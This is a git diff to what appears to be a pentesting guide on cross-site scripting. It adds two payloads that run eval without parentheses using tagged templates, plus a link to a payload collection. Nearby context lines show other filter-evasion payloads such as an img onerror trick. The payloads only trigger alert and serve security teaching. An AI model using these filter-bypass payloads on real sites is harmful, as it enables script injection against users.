diff --git a/pentesting-web/xss-cross-site-scripting/README.md b/pentesting-web/xss-cross-site-scripting/README.md
index 0ead0b09..5765d4ea 100644
--- a/pentesting-web/xss-cross-site-scripting/README.md
+++ b/pentesting-web/xss-cross-site-scripting/README.md
@@ -453,8 +453,11 @@ atob("dGhpc2lzYXN0cmluZw==")
 ```javascript
 alert`1`
 <img src=x onerror="window.onerror=eval;throw'=alert\x281\x29'">
+eval.call`${'alert\x2823\x29'}`
+eval.apply`${[`alert\x2823\x29`]}`
 ```
 
+* [https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md](https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md)
 * [https://portswigger.net/research/javascript-without-parentheses-using-dommatrix](https://portswigger.net/research/javascript-without-parentheses-using-dommatrix)
 
 #### JavaScript comments \(from [JavaScript Comments](./#javascript-comments) trick\)